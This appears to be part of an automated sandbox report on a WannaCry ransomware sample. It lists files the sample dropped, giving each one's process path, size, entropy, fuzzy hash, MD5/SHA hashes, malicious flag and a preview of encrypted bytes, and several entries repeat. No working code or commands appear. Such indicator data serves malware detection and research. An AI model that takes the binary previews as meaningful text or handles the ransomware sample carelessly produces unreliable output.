                                                                                      Preview:S.4..#.F..x..,...b.....D_.r.9..'...`'....pp..H..........^.@..H.t.V.p.....y.r.....x..<.....Q.s.....t..Mu.Z=I)...wpNi0\.%.Dn......$l.....S..ht2O..}L5..Q.j...N.G..H*.{..A..&z...*}.......F#$.....:<d.3...N..q.P.s...h^%...2_.J../..bR..3b.z.{O.X.....@J.w.>DO.Buu..K3..M.[..M..!G/C.-O.4`.{E..4}..G..7..d.='...J.......ks...P.........>.....+v.a?a...n.a../......../..J..w.8.c...K....=.......y.~G..H..;..Ov=...^.Ym.k..K.5.o.......X.M.....V......[...j=.S.|....b.Z....{nBPi..5...[.{..~w.mO.Y..F.=.1=..b..%g./..Y.....h...u..$d2.R....:...../.L....}..K...N..... vm...l.w7.<`'.m.rpe....4..M.l...5.c..r..z..g..^Y...,.E1..y|m.y...>..d......@.@.1.w.g.QQ.H......,..Z.....&..._...>....=...,.|.w..s.].$...}.....".(....v..W...m.E.1...)......M+6p..gp.T....%..$.l.w.8~g].hY...>/B.V.C..,.."..g.B0...N..E$...-..>1a.=kE.|.#EOq.,...x..`..*&6V(.>~..?[Q....2Wi0.....O!.....&.N..6u..:..Hg...z...P.A.>.5..u.........{.Z..|Dcv.z.........-vm.y.qH.T'...P..%[Q..F....t.Y..|$i.ws!...S...~.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.853667894714173
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk35rizQDNromoSsTrxrlYjmpJuNLCVFmfWM/zOYn73gOLmWAeIEtU8:bk39QuemoSsTlr2jueLCLwN/aYn7wOIU
                                                                                      MD5:C76323EE0524FAE0CBB23068239AB9AB
                                                                                      SHA1:0A9D0900A0A4A4B87D6B49651A39958B16077834
                                                                                      SHA-256:04C6447FB3A4FCEA0A5B0DF84D4DE13434807D1DF6486DC52A6BC1FB280880D3
                                                                                      SHA-512:8DF409CB764F413071CF967D8A09FFCE01027BE0EB8F7994E8137D4CA94DE6FADE7388BF18BAE2D3B5B24F9BC10E0FB25628C675CF3ED2DA745F0AA6874855C3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......s^PX8.H..\.@E...^.S.]v.Kv!^...S;..Rc..~.$D/.Y...XN/>.@.H........Z..h..xb.....d.~..OM.._.>.t.s.X.6f.....s\.8.}.%..........T......D...p..QTD..0.X.....e;y...2.o4..^.No..%.M....W......?.,6....{c.D......q8.-..d:.1..._...Jg.Z......0...Q....+..{<9e...l.............;W..y..a....=.9d......L.qY~.1..$......l.>....e:<"g..x..z't...xl.[P>-Cg.]1....x..!..ps....A..V.U,0AP&..a!]%5C.....Z"i........K.T.*b.Y..`...t........|(...P{.A#]..P.=B|..D..S...~....W0....Wy..\3.RL...n...q....\..O.@N.W.3..KC.....]w....9..7./...)..I.E.gh.$U..s.F<RbR1..F.P.$$C.=..hW6....~0.0...F-.....PO.Z...}.h.6....pG..O!......>...%!W..|.J...JMa...Z....a>...sz4}........|...n.(./.O!..2....qK....&bH..&...">..?.|p..8..."... f.....k;...h...}/5pSJ.@xb...h.....{........u%.Co.&.ZJ.$?.M......v7..R1$..*.C....II#..g....>.......2.A:..r.J!C.5.....7".l4..O@..z<k..1....l J|jL.....U.w|....x.p^P.nm....)...I...vO.....2r...j>.wUZE.B!==7...@....c..q.z.......k..X.`...[@..)..#J.....F,.......G.7..f
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.853667894714173
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk35rizQDNromoSsTrxrlYjmpJuNLCVFmfWM/zOYn73gOLmWAeIEtU8:bk39QuemoSsTlr2jueLCLwN/aYn7wOIU
                                                                                      MD5:C76323EE0524FAE0CBB23068239AB9AB
                                                                                      SHA1:0A9D0900A0A4A4B87D6B49651A39958B16077834
                                                                                      SHA-256:04C6447FB3A4FCEA0A5B0DF84D4DE13434807D1DF6486DC52A6BC1FB280880D3
                                                                                      SHA-512:8DF409CB764F413071CF967D8A09FFCE01027BE0EB8F7994E8137D4CA94DE6FADE7388BF18BAE2D3B5B24F9BC10E0FB25628C675CF3ED2DA745F0AA6874855C3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......s^PX8.H..\.@E...^.S.]v.Kv!^...S;..Rc..~.$D/.Y...XN/>.@.H........Z..h..xb.....d.~..OM.._.>.t.s.X.6f.....s\.8.}.%..........T......D...p..QTD..0.X.....e;y...2.o4..^.No..%.M....W......?.,6....{c.D......q8.-..d:.1..._...Jg.Z......0...Q....+..{<9e...l.............;W..y..a....=.9d......L.qY~.1..$......l.>....e:<"g..x..z't...xl.[P>-Cg.]1....x..!..ps....A..V.U,0AP&..a!]%5C.....Z"i........K.T.*b.Y..`...t........|(...P{.A#]..P.=B|..D..S...~....W0....Wy..\3.RL...n...q....\..O.@N.W.3..KC.....]w....9..7./...)..I.E.gh.$U..s.F<RbR1..F.P.$$C.=..hW6....~0.0...F-.....PO.Z...}.h.6....pG..O!......>...%!W..|.J...JMa...Z....a>...sz4}........|...n.(./.O!..2....qK....&bH..&...">..?.|p..8..."... f.....k;...h...}/5pSJ.@xb...h.....{........u%.Co.&.ZJ.$?.M......v7..R1$..*.C....II#..g....>.......2.A:..r.J!C.5.....7".l4..O@..z<k..1....l J|jL.....U.w|....x.p^P.nm....)...I...vO.....2r...j>.wUZE.B!==7...@....c..q.z.......k..X.`...[@..)..#J.....F,.......G.7..f
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.792248828138754
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:HE3UqYy37ZIj0wjOD+dIWDN63IzAt7akdflfjG/he:k6y37ZI0GO6yA6l7aktRjQg
                                                                                      MD5:BA5AC4486C007CE780589F281FAB1DD0
                                                                                      SHA1:10F644F3D0001749D7F7957E9A9B20DB955B6709
                                                                                      SHA-256:E481B821E28BFCAA0E6A622743CC914FBACDEAA4C4B03666D049B3BDFBCF5183
                                                                                      SHA-512:345F375AA2EC6E82525B568A0091000500A8FBC25FA06C8EAACBD0D0FD73ACEA34099AE033B5EC68877133DD1BC138E7A8FD73A09180498695897DD528CFE43C
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:Ts....\..B......[.@.^.;._.../...,H...m..u..T....=....#^z.&.E...6.U.v.....;vg.b.|....6f3-.....B.$'... i.....'...!{*x...:g7...]....I.....~...MK...._'......~......D..M.....3.....[.IS.2.D./...5\(+...........[;.6%$e.r0.J.5.o..@.a....>Xj".2....e.....nZ3Y.......@. %.H..a.(.(.T.....2.......k.j..Y.J<m..Vi.]..3bQ{..d.C.$q.Y.~..]=....l\r.Imw...f....j...*......3Q..W5.B...Qol:..1=..D...e.R.Z1E.si..%Tc..X.u.#.1.S.....i.8...S....N.).VU&..,......x.r.hOT..A.%.\..`7..q..-..EM/.r.....l......$;.. .y...*.......|.d.9..p... ...b..X/..U3.vxU.e.D...R.......,......s.LY....jN3.....j.bm...~...S|........n.k..C.p.9...&.#R.Cb!.Oe.2.K..:.E.#<..'K.....hDW.......T.|.+.z.kn......y..M/......M..S.g..Y}..4..j[PL.C.........w!F-=.l..|.o...B.{..:U^..*....?.::Yy......x.J..^y...3}...m.AL...N0G..r...]^...u>..p.I..n.8y..2......}..R..r.U*#..g..L..........l.Vee..m.a...$*.,l..l6......Af....+vQ....%@.Z.G..."....s.......Bk...X...%8...f..Jx.8.(u...a..g.ySX~...rM..Hk].
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8457542490456715
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkhFCP7ULZ6qgU3KbNvceu/pA4WUpEteWV2JwFe5Eb1R9te5hK/m:bkhFDKUapmpnWUpEttV2ifblteQ/m
                                                                                      MD5:8B79ABE6404153CC718956DAF934EA03
                                                                                      SHA1:37C99F3547DC31FB2FE51BB86AC5EB9A750DC03B
                                                                                      SHA-256:0AF591EAF8ED1AD460ACF620B79C53E63D8E628CA46BAA33EC9218D0A8B3EF6C
                                                                                      SHA-512:2A9A98CEC6FAFA3F6587BF0E7A578694E7D1B8E85F3117C30A7F2A884212F33E1A7FEAB4B092301FB5B4DB0AA7A07682B83CE9BD71FFC9CDA11C349B5362049F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........GF....2l?.m.Q.-F.1....!c..0.x..&"...........\.\..H.,m..k7....s~.F.2<.../..5m...$1..=.......l.r...;UO_.......!k.-.l.V.........]....C..`A....&..v=i..6.*..Y...L..%..........kb..}.F...O............./...".....M..)_x...6.m].O.p..6...'l..kHc.w.............<...v.ppV.s.P*G8W.N}R........5j...?..m..:........jUS4...;.Q..."....~..q.^9%.+d5.X...".fEF..f.r...NF..&......Nfo.......f...~..Y...dp..=}#.J....P...C2.....P<..3!Q.....T...Bj...yr...7C....n{O..G..L.M..<...F..{.uG uE{D./.q^'...D.c*.,]....F.0..QN.........}.Do.A...F..m..@..0.x.48.kn..l7x.O.T.'.}.....R..t..YEx.W.N..b......P..J.%.?../..m....eSNFD..3v.U.........c..9i..Q...r..a...:Z..2..fg.......?.....lMK*.z.. ..+R...U.X..........j.~H.f.RgK.D....-.......u5.l.....K....'Hw.x...4.......v.;..3R.UjE..KeW.dV}2.R....l..R51...zf.k..T..z....@..<..Ys [{e..E+....N.(..u.@...O..1.:....X.L'.C.;..l.xD.Uh...H^.!c.*U9...#g.....%Pa...T..".W.*.F>W.`lZ....%.2i....#9,.%k@.-.DwF|.. 6....;.x..we5.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8457542490456715
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkhFCP7ULZ6qgU3KbNvceu/pA4WUpEteWV2JwFe5Eb1R9te5hK/m:bkhFDKUapmpnWUpEttV2ifblteQ/m
                                                                                      MD5:8B79ABE6404153CC718956DAF934EA03
                                                                                      SHA1:37C99F3547DC31FB2FE51BB86AC5EB9A750DC03B
                                                                                      SHA-256:0AF591EAF8ED1AD460ACF620B79C53E63D8E628CA46BAA33EC9218D0A8B3EF6C
                                                                                      SHA-512:2A9A98CEC6FAFA3F6587BF0E7A578694E7D1B8E85F3117C30A7F2A884212F33E1A7FEAB4B092301FB5B4DB0AA7A07682B83CE9BD71FFC9CDA11C349B5362049F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........GF....2l?.m.Q.-F.1....!c..0.x..&"...........\.\..H.,m..k7....s~.F.2<.../..5m...$1..=.......l.r...;UO_.......!k.-.l.V.........]....C..`A....&..v=i..6.*..Y...L..%..........kb..}.F...O............./...".....M..)_x...6.m].O.p..6...'l..kHc.w.............<...v.ppV.s.P*G8W.N}R........5j...?..m..:........jUS4...;.Q..."....~..q.^9%.+d5.X...".fEF..f.r...NF..&......Nfo.......f...~..Y...dp..=}#.J....P...C2.....P<..3!Q.....T...Bj...yr...7C....n{O..G..L.M..<...F..{.uG uE{D./.q^'...D.c*.,]....F.0..QN.........}.Do.A...F..m..@..0.x.48.kn..l7x.O.T.'.}.....R..t..YEx.W.N..b......P..J.%.?../..m....eSNFD..3v.U.........c..9i..Q...r..a...:Z..2..fg.......?.....lMK*.z.. ..+R...U.X..........j.~H.f.RgK.D....-.......u5.l.....K....'Hw.x...4.......v.;..3R.UjE..KeW.dV}2.R....l..R51...zf.k..T..z....@..<..Ys [{e..E+....N.(..u.@...O..1.:....X.L'.C.;..l.xD.Uh...H^.!c.*U9...#g.....%Pa...T..".W.*.F>W.`lZ....%.2i....#9,.%k@.-.DwF|.. 6....;.x..we5.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.835980219995817
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:sq/9gJBViFGS08UFvpmTxrZ5CCc2/HM674gEK19wBSPJFhPDLOeTxb+j:sq/9grViFGLEJOCc2PM674gbuMFhLLOP
                                                                                      MD5:81DAAD86799583BA5E7827782DD1CB59
                                                                                      SHA1:1FF6345EE59F3C0B866BAEA6B8BC2692A0A726D5
                                                                                      SHA-256:79A35888A25D250BA397EFDAB1BA456BDBBAC319B98D20D0EB3EAE62501C2BC3
                                                                                      SHA-512:211BE175708F0DD292800D6D983750DCB958F9738194357B10252B308E3DFACA80F4E0C2B2B1EE249A757CF89ABD5F994F12DE45C7008ECE684261926A3262C0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.~-..^..'.i..P.MwD..B.5.."g..,>.:....Z......ps...!$.HWu.^..m...........W..}MW.|7.....".......]...y<.Z..P.r..|.g.=k.W....$. .....y.h.m...l..E|.Y08H=1.-.n'e@.3...OC.B\.kn.....l2..[.s..sQ.....vP....+..b....V..................Y.OO......=,I.-M.(..H...W........RUFJ.Y.I@.....f...*.."...M......U{)Q.ly.!J8~.ZQ./......@9....b0.$....).>..n...K0.z........R.^...I..v..~4B...;.....r..=d..;.7K..2...S.rDj.g.#..v.z%..H]..h.4`.aSY.L.#...I.B...xG....Y..)...&..e.'.....;hDf...6...}8...Q.C.I.....r+46[...p-.|.FG....,V.lr..r.'US.;.m..k..._c.Z#.tA.H.x..,.c.7(.j.Y..b.P....h..4...b.p.4.V.|5..Y...t[...K.f.L1...g'...Z.}(.j4V.T... C..:.7.d.r.f2...N.*..ekj.V....._,.*z.I.q..u.....%....h.\.1b.ZS...\Bi|.....C.....ND..mPY......)....a.Z.S.......f....<......y[O....O.+..QJd8....Z...g...g...?:.T>.l&...S..9M..:!....~..e..#....@.vN8...cQ.R(Q.).....GG@...x..-...H.3....G.0./N..Xi.*..9../.l.E..C.0.d..oS'..o..,.QC..H...P.}.Q.e.=6."..25&....m.8CJ+...`.,pY..HJr.8.Q38...4w..U.....N.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.853967486264283
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkmBc+M1pdOBwAUkThd5CMfasSrUUwAMJdJ0VqEGtidCs1bdlRzZTXP:bkV+cEwA3ThdEXsS4jDVuqEGtipBRzR
                                                                                      MD5:69928CEB9415852CA340971809EE1B76
                                                                                      SHA1:68E55B0F0386A8CF0569207850F352681D57B5C4
                                                                                      SHA-256:C00D6634FF9CA6FEB088721CD88DDE643807F0B1FEF1413E94080EFCD7D0ECF4
                                                                                      SHA-512:BBC1BA32D922AA55FA15AC58403E54CE9EF5FE99C201A7FF4C5272F7B9E98E9D2CE23F709D338CE0B67A449F359C78C5365A0685C08E39E57B5BDAC700D49F1D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......[.....L..mVp'bfx..!.....s....%..:x.3..,+K#...Gp....<.D^EX'..I.h2...{.....a.Z9J..o.].....7.j...;...].....Np..dw..fw....8WeB.........[1...0.u!b ..kN."8:.......'.j:?IM.o../..r.o....6....R_.n..aB...8.X..s..yzR.............V.l....Z...*C.....{...............01Kc.&..>..&L,....%6..?.W.).a....85u.xd.B..!..v.n.WZ......)~..j1.../b.ZE......z....BTW......b..>~=. O.......i.g.APHTpY....&*!.....!......C...HlJM@7..-{=/Jz...8.he...9.Bja....=..A5w...1.D._[...Q8`"....\*9.&....I.\...7]..+...t//..Ac..w.`4.n>..WP.....QK..;......X.....v.}8..[..;.G/......s...;Zx-.<._.{b.E...P.X.ey'.v.......<....}.........;R3.K..a?.^D:.,.PFF..nm....a".J..)..7P9mG.E\F. ....O.M5a4.......H5z.yl6.C..7k.3...,.......:?%...3.........-..TM..4......=..A.^.j........r>2Ch..v...fp.([....B.Rn....u.\...v.i.5}y.....x.hU.$pJ.B.............@...<........F3j........<S...0A.Oq.9...Y.lVg....q..J..(z\w..x.....%......g.....R.<....}J.q.;.<.[N,M......y..*:.L.2..7.......0N.VMh..a
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.853967486264283
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkmBc+M1pdOBwAUkThd5CMfasSrUUwAMJdJ0VqEGtidCs1bdlRzZTXP:bkV+cEwA3ThdEXsS4jDVuqEGtipBRzR
                                                                                      MD5:69928CEB9415852CA340971809EE1B76
                                                                                      SHA1:68E55B0F0386A8CF0569207850F352681D57B5C4
                                                                                      SHA-256:C00D6634FF9CA6FEB088721CD88DDE643807F0B1FEF1413E94080EFCD7D0ECF4
                                                                                      SHA-512:BBC1BA32D922AA55FA15AC58403E54CE9EF5FE99C201A7FF4C5272F7B9E98E9D2CE23F709D338CE0B67A449F359C78C5365A0685C08E39E57B5BDAC700D49F1D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......[.....L..mVp'bfx..!.....s....%..:x.3..,+K#...Gp....<.D^EX'..I.h2...{.....a.Z9J..o.].....7.j...;...].....Np..dw..fw....8WeB.........[1...0.u!b ..kN."8:.......'.j:?IM.o../..r.o....6....R_.n..aB...8.X..s..yzR.............V.l....Z...*C.....{...............01Kc.&..>..&L,....%6..?.W.).a....85u.xd.B..!..v.n.WZ......)~..j1.../b.ZE......z....BTW......b..>~=. O.......i.g.APHTpY....&*!.....!......C...HlJM@7..-{=/Jz...8.he...9.Bja....=..A5w...1.D._[...Q8`"....\*9.&....I.\...7]..+...t//..Ac..w.`4.n>..WP.....QK..;......X.....v.}8..[..;.G/......s...;Zx-.<._.{b.E...P.X.ey'.v.......<....}.........;R3.K..a?.^D:.,.PFF..nm....a".J..)..7P9mG.E\F. ....O.M5a4.......H5z.yl6.C..7k.3...,.......:?%...3.........-..TM..4......=..A.^.j........r>2Ch..v...fp.([....B.Rn....u.\...v.i.5}y.....x.hU.$pJ.B.............@...<........F3j........<S...0A.Oq.9...Y.lVg....q..J..(z\w..x.....%......g.....R.<....}J.q.;.<.[N,M......y..*:.L.2..7.......0N.VMh..a
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.816282907630795
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:mf4tTlm+H9kUKdCP/LjqRB6i/I/BM2XLpU7VwGHlOiUEFUAj:lTlJOUCCnLjMpIpnbpU7zlOiUEFnj
                                                                                      MD5:4CA2864580AF180D4A7F3E0D55E56001
                                                                                      SHA1:6E51DB5F96120F7AC27DED7E978655E7FC572A47
                                                                                      SHA-256:F1978364577F21D4BA1BA422702943DD4A9ACB62A9957321C82B2712C2DF1EDB
                                                                                      SHA-512:6F232EB08E3ACD1D8A9E1A160FE8787456697E670A1AA9DBB2D7CEE2BD75B1CCB7FE2908E4B9068388216AE68C26150FCA3C0D607AAFBC24B786116E52F34C21
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.b[T5..o>q.......W,..zU ...?Via.s.B...L.T....u1y.~.Hra;.....Z...2.4z.2..S..X1......;....... .s..hi&1...fed..]u..{.k..hW..y...:...Nh...}....W8..E X....X!.........F..M........!..<oK.?.....40.=N ..AR.p.,.....E..A.0....a.A<..\MCM.m...g.|...1JI{/4....y.....Y.........[.yE.:5...4.....6|7......>......t..8....jV..g.......?.3....z.j^.A..s|...K.II..I....a. ...V...._*.,....H..7...o.v.....m...hX0.mt5.....D.#....\.P.y...5....q.oo...c..^S..h.....a.T^(...Pf .`[....N.......#....P..ajO...~;.2..\..*.b...K.L...@.}?#JQ...S6..iP'B.E.........;wS..A.A.U...wE.5.....s..ghhL..".[9<..K..G...*".p..z.8.~T.%......H(&V.\.....bO.8K.7?.'q.......e.`..<.j..."aZY....hm.k..Z.q..(.s..^.8...y@..0G..._S......%.[S..$...i........-\...EF..-.;...........5h.x_......y[.Cj.).h.]./H)@.Z...g;.$q.WY!2.q.......,...y..}{....Z..........U*......V.....1.......:...S..f[@H...D..u.n..@...!Jt-w$.,.,.=_L.P.}._:.,L.."|I....J..x.X]..0yt..s.3.L..h.......'...&i.is.b.......#.....K.E............l.j.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.844291868371403
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bksf5EpkzYbD9oMgh42/GzwXBOFt6GqClY1RM8RCesoTRa8YJ2/KGg7:bkHkTDZTxct6Gqt1RRRCsTRaHIg7
                                                                                      MD5:23F8823F69A9DC3EF69E8EC0A1BFEA0E
                                                                                      SHA1:17DC322B774DC5C72DC67B1EA6AFF865B8D9FA12
                                                                                      SHA-256:51B7A65EBD76CCE77A630974BC9A37A530BE8A9B3EDBDE173CDBE507EEDE36B2
                                                                                      SHA-512:E9F373F6B09F36B41367167891C14EDE37491FD4EDE2BBA499F730C8FC4C22B19FBD609082427B380697E798BBF1D736710286C6438E20836C2BA1695ECA9D95
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....c.WIA)..W$..,.....N"#.)..O.....%...._d..E.H.....!...W5...._.y.6....1>..,..n../^.)..U.....L7'....)LX............R.C-.p..v......j,M.&.ei.(+.td.....t@.7.....#.;M.R..5...-.4..@...9.z....".....;.m.9*.J.% .K.....DZ.u.K...)...c..p.q..2C!..[%..<._.R9............a...y..."..).^.t.P.......4.=`.R. ...$...q....g.>........BO....-..w..u.1.!>.1P....K.'..gF...X...IM....Q........,mE.I$#..........`..:=.4t.+sX.m...;...5p.S.R..t.............+.Q.%c.o...=|....O}86.{......l...e/...y.Z..W..kAMc.....]....5.43.....u....(..z...S.Z...txh..O.f..dE....U..*{y.F}...P..>F..=G.>ehyH.....gf.6..s|.+MU.r....~*D.....>...u.p.`.s....q......mlb....:...dhC.7t......{q.X.......H._F.%..f).o..m...~%...<Q.1....i;A......a.[d..g.....2..=.$...v.......wA.P2I4?..%..~.~...$Hbh..L!.N.8O.>.....wN..I>.J....&..37..x.7DHY.w.....kSh.8.....!L..6..l{.p......!4c.6...F..;.F.v.>......D.........J!w.(..Hmn^.V......Km9..S.>...%....<..lS_.6.&O..,.c>1P#...X....4..<h.y.F....5.2.q.nKVYe
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.844291868371403
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bksf5EpkzYbD9oMgh42/GzwXBOFt6GqClY1RM8RCesoTRa8YJ2/KGg7:bkHkTDZTxct6Gqt1RRRCsTRaHIg7
                                                                                      MD5:23F8823F69A9DC3EF69E8EC0A1BFEA0E
                                                                                      SHA1:17DC322B774DC5C72DC67B1EA6AFF865B8D9FA12
                                                                                      SHA-256:51B7A65EBD76CCE77A630974BC9A37A530BE8A9B3EDBDE173CDBE507EEDE36B2
                                                                                      SHA-512:E9F373F6B09F36B41367167891C14EDE37491FD4EDE2BBA499F730C8FC4C22B19FBD609082427B380697E798BBF1D736710286C6438E20836C2BA1695ECA9D95
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....c.WIA)..W$..,.....N"#.)..O.....%...._d..E.H.....!...W5...._.y.6....1>..,..n../^.)..U.....L7'....)LX............R.C-.p..v......j,M.&.ei.(+.td.....t@.7.....#.;M.R..5...-.4..@...9.z....".....;.m.9*.J.% .K.....DZ.u.K...)...c..p.q..2C!..[%..<._.R9............a...y..."..).^.t.P.......4.=`.R. ...$...q....g.>........BO....-..w..u.1.!>.1P....K.'..gF...X...IM....Q........,mE.I$#..........`..:=.4t.+sX.m...;...5p.S.R..t.............+.Q.%c.o...=|....O}86.{......l...e/...y.Z..W..kAMc.....]....5.43.....u....(..z...S.Z...txh..O.f..dE....U..*{y.F}...P..>F..=G.>ehyH.....gf.6..s|.+MU.r....~*D.....>...u.p.`.s....q......mlb....:...dhC.7t......{q.X.......H._F.%..f).o..m...~%...<Q.1....i;A......a.[d..g.....2..=.$...v.......wA.P2I4?..%..~.~...$Hbh..L!.N.8O.>.....wN..I>.J....&..37..x.7DHY.w.....kSh.8.....!L..6..l{.p......!4c.6...F..;.F.v.>......D.........J!w.(..Hmn^.V......Km9..S.>...%....<..lS_.6.&O..,.c>1P#...X....4..<h.y.F....5.2.q.nKVYe
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.800668927446763
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:0ipztOLPULB+OFdAsUlYqDE0UiiKktyAaalI759zzan:0ip5OLPUL9AlA0+l8elI7bnan
                                                                                      MD5:A90AAF9D97AADE2B623D12B03E28954A
                                                                                      SHA1:FAECFBC53D0C8889AB2169B74F01D55F896C3489
                                                                                      SHA-256:6C09AB875AA6FF72B8F3FD401E4A7AE1B02C396EE42B7812CD5BA332742506BF
                                                                                      SHA-512:62EB062F90904ECE5734AF27928009B9AC6D746E42BAA12DDC26C5E39AEC7AEEADAD1D98FE191E625D8EE6B6CE6E8A0D7FB03B19E81902C6ABE1E6221758B71A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.^7......Su.K.=.......E....%d.Sq\...['..,..3." ^#6.Ks.#....C......j.....W..@.69.....,....f.....x.M.....X.s>b.._z.Wb...'QH...`k..r..z......E.T...0..._.3p=M7.t*l..ot...q./..6G7@....^x)...,+d]......NL...@>...S.@.W..~-.x.L.....A.(J..q$......f.4..v..<(.OVD......a.m.e,._..T..|-.Dk.......0.l..r...B..`{...,h.r.2....$..... ..}..u.[@.U.F{.............h.RV\./_..<...r.t*..w|+../^...L..=S...M(wL.e%..I.......*.M..6@j.....ny.T...d.Zy..U.L].\.a..q.]e...L.r,f..ny....f{.`..<......9\....Rp.Q.:VJ......o..6.q...P..o._....6b..2..U...R..y......jR.....o...[.......Duo.+.j+....k1.....F...UaB^...e...7&vi6eeH ..*..H.v.[....L9X.j;.>[i....sR2jE..ES.G..Ud....]..b:.W..U...../..m..fp}.".E......3r.3.sU-J...p.,..9.>c..};i.J.B..M....y.-..;..//...k1b)......qm"L...gw..s[S.G.7&O..m.q....<Sp.....4...}}D..;........6...>.;..T.?....%..........g.. L.qQ*..Q.....x 8...[.....C(....@..i.)`~p...u..5U.%..k3B....4.qf....8.:.+.j.......NE...Q..3..XS".b..6...Z...JV...T.....d#.pp..s...(......o.....a.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.820119962376173
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkCCxsxOUYpP5ly8PWvbBVjFp5m6OQnkcCoqpI4hbXYH6XXf759chCV0twOm:bkCYsxOTy8+vbBVjnOVoqpIQb3+u0tI
                                                                                      MD5:0429E14391BC333FAA2826E3A0D8980B
                                                                                      SHA1:649D946886170B0A11095C4383CBC7BDE69C251E
                                                                                      SHA-256:5F86A8C568D9ABB42A4FED77727AE4AC0FA55C72AC9AAA3FDB0525BC2513E838
                                                                                      SHA-512:577938A6BD9CD8C0FC67ECA978176604D73056F7113C0CA52277DAC2BA65C9396918E09BF18501D2E4CB9074462125C96FBFC76B97D85729112DF7DA0E3B90C7
                                                                                      Malicious:false
                                                                                      Reputation:low
